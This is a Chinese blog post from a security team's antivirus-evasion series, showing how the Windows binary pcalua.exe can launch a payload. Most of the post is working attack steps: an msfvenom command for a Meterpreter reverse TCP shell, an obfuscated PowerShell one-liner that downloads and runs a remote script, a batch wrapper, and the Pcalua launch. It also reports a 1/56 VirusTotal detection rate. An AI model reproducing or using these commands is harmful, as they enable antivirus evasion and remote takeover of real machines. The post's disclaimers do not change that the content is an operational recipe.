远控免杀专题(55)-白名单Pcalua.exe执行payload

Posted 2021-04-10 白帽子

声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

---

一、Pcalua介绍

Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。

默认在C:WindowsSystem32pcalua.exe

二、Pcalua使用

命令为

Pcalua -m -a payload

三、执行payload

这里选择使用powershell生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1

并对powershell命令进行混淆处理。

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"

然后将该命令写成a.bat批处理，方便执行。metasploit进行监听

在测试机上执行该命令

Pcalua -m -a a.bat

发现只有火绒提示"powershell可执行操作" 放行后msf可上线

放在virustotal.com上a.bat查杀率为1/56

四、参考资料

基于白名单Wmic 执行 payload 第十季复现:https://blog.csdn.net/ws13129/article/details/89791442

E

N

D

guān

关

zhù

注

wǒ

我

men

们

Tide安全团队正式成立于2019年1月，是新潮信息旗下以互联网攻防技术研究为目标的安全团队，团队致力于分享高质量原创文章、开源安全工具、交流安全技术，研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。